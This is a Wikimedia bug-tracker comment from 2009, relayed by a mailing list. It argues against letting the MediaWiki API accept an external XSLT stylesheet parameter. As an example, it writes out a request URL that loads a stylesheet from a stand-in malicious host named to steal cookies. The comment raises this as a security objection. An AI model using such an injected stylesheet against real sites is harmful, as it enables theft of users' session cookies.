https://bugzilla.wikimedia.org/show_bug.cgi?id=19528
--- Comment #4 from Victor Vasiliev <[email protected]> 2009-07-11 06:18:18 UTC --- (In reply to comment #2) > The processing will still be done client-side: The bug opener refers to the > <?xml-stylesheet href="location-to.xsl" type="text/xsl" ?> which could > optionally be added to the top of the XML document in order to have a direct > transformation when viewed in the web browser. > And what if someone points to a malicious XSLT? E.g. api.php?action=query&xslt=http://malicious.site/steal-cookies.xslt Also, this is API. *Application* programming interface. It's not intended to format a user-readable output. I suggest WONTFIX. -- Configure bugmail: https://bugzilla.wikimedia.org/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are on the CC list for the bug. _______________________________________________ Wikibugs-l mailing list [email protected] https://lists.wikimedia.org/mailman/listinfo/wikibugs-l
